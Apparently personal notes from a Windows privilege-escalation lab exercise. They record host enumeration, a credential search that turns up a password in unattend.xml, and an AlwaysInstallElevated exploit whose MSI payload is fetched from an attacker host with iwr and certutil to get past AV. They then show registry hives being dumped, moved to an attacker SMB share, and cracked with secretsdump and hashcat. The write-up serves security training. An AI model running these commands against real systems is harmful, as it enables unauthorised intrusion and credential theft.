# Brief - As part of an assumed breach assessment, you have been granted a standard user account with RDP access to a clone of a standard user Windows 10 workstation with no internet access - The client wants as comprehensive an assessment as possible, so Defender has been disabled - No internet access from foothold host, so you will need to transfer any tools over yourself. - Enumerate the host fully and attempt to escalate privileges to administrator/SYSTEM level access --- # External Enum - `ping` test ![[images/Pasted image 20260301114620.png]] - `nmap` scan - light ![[images/Pasted image 20260301114712.png]] - NOTE: Microsoft Windows 10 1709 - 21H2 ![[images/Pasted image 20260301115127.png]] - `nmap` scan - detailed ![[images/Pasted image 20260301115208.png]] - `nxc smb` scan ![[images/Pasted image 20260301115331.png]] --- # Internal Enum - `rdp` connect to target with given creds for low-privileged user - look at user's home directory ![[images/Pasted image 20260301115756.png]] - `systeminfo` output - WIN 10.0.18363 ![[images/Pasted image 20260301115924.png]] - KBs and NICs ![[images/Pasted image 20260301115938.png]] - active connections ![[images/Pasted image 20260301120324.png]] - installed programs ![[images/Pasted image 20260301120300.png]] - `wmic qfe` output ![[images/Pasted image 20260301120024.png]] - `whoami /all` output > no interesting groups or privs ![[images/Pasted image 20260301120116.png]] - all users, groups, and password policy ![[images/Pasted image 20260301120414.png]] - drill down on the `wksadmin` account ![[images/Pasted image 20260301120458.png]] --- # Search for cleartext creds - move `lazagne.exe` to target and execute - nothing ![[images/Pasted image 20260301121846.png]] - no chrome dictionary files - no `plum.sqlite` db for stickynotes - use `get-childitem` cmdlet to search on `iamtheadministrator` > nothing ![[images/Pasted image 20260301121212.png]] ```powershell get-childitem -Path "C:\" -Filter "iamtheadministrator" -Recurse 2>$null ``` - look for files containing "password" ![[images/Pasted image 20260301121403.png]] - `Console_history.txt` looks interesting > nvm it's just what we're typed so far ![[images/Pasted image 20260301121505.png]] ```powershell findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml 2>$null ``` - try a different `findstr` command from `c:\` ![[images/Pasted image 20260301122730.png]] - `unattend.xml` looks interesting > password for `iamtheadministrator` leaked ```powershell findstr /spin "iamtheadmin" *.* 2>$null ``` --- # Privesc - creds for `iamtheadministrator` do not work with `nxc smb` and `rdp` - move `winpeas.exe` to target and execute - the output is super nasty looking > skip this ## Exploit `AlwaysInstallElevated` - enumerate `AlwaysInstallElevated` - looks like it is enabled ![[images/Pasted image 20260301124801.png]] - create and host payload, then open listener ![[images/Pasted image 20260301124922.png]] - download on target and run - appears to be getting deleted > I thought Defender was supposed to be off ![[images/Pasted image 20260301125344.png]] ```powershell iwr http://10.10.15.203:8000/aie.msi -usebasicparsing msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart ``` - AMSI and AV are enabled > wtf, the brief said it was supposed to be disabled ![[images/Pasted image 20260301125716.png]] - try to move `aie.msi` with `certutil` > that worked!! ![[images/Pasted image 20260301130901.png]] ```powershell certutil.exe -urlcache -split -f http://10.10.15.203:8000/aie.msi aie.msi msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart ``` - we have a hit on our listener - we are `SYSTEM`! ![[images/Pasted image 20260301131001.png]] --- ## Exfil SAM, SYSTEM, SECURITY hives - standup `smbserver` on Kali to received exfiltrated hives ```bash sudo impacket-smbserver share -smb2support . ``` ![[images/Pasted image 20260301151619.png]] - make local copies of SAM, SYSTEM, and SECURITY hives on target ```cmd reg.exe save hklm\sam .\sam.save reg.exe save hklm\system .\system.save reg.exe save hklm\security .\security.save ``` ![[images/Pasted image 20260301151856.png]] - push hives to Kali's `smbserver` ```cmd move sam.save \\10.10.15.203\share move security.save \\10.10.15.203\share move system.save \\10.10.15.203\share ``` ![[images/Pasted image 20260301151946.png]] - extract password hashes using `secretsdump.py` ```bash secretsdump.py -sam sam.save -security security.save -system system.save LOCAL ``` ![[images/Pasted image 20260301152304.png]] - crack hash for `wksadmin` using mode 1000 for NTLM hashes - NOTE: only use `nthash` portion of `lmhash:nthash` ```bash sudo hashcat -m 1000 hash /opt/rockyou.txt ``` ![[images/Pasted image 20260301152638.png]]